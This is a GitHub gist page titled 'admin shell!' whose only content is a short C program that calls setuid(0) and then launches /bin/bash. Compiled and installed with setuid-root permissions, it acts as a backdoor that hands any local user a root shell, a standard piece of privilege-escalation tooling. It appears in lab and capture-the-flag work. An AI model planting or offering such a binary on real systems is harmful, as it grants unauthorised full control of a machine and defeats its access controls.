Skip to content

Instantly share code, notes, and snippets.

@h4sh5
Created June 15, 2021 07:08
Show Gist options
  • Save h4sh5/741cb634fe7bace278cbdde8dd7a55b6 to your computer and use it in GitHub Desktop.
Save h4sh5/741cb634fe7bace278cbdde8dd7a55b6 to your computer and use it in GitHub Desktop.
admin shell!
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main() {
setuid(0);
system("/bin/bash");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment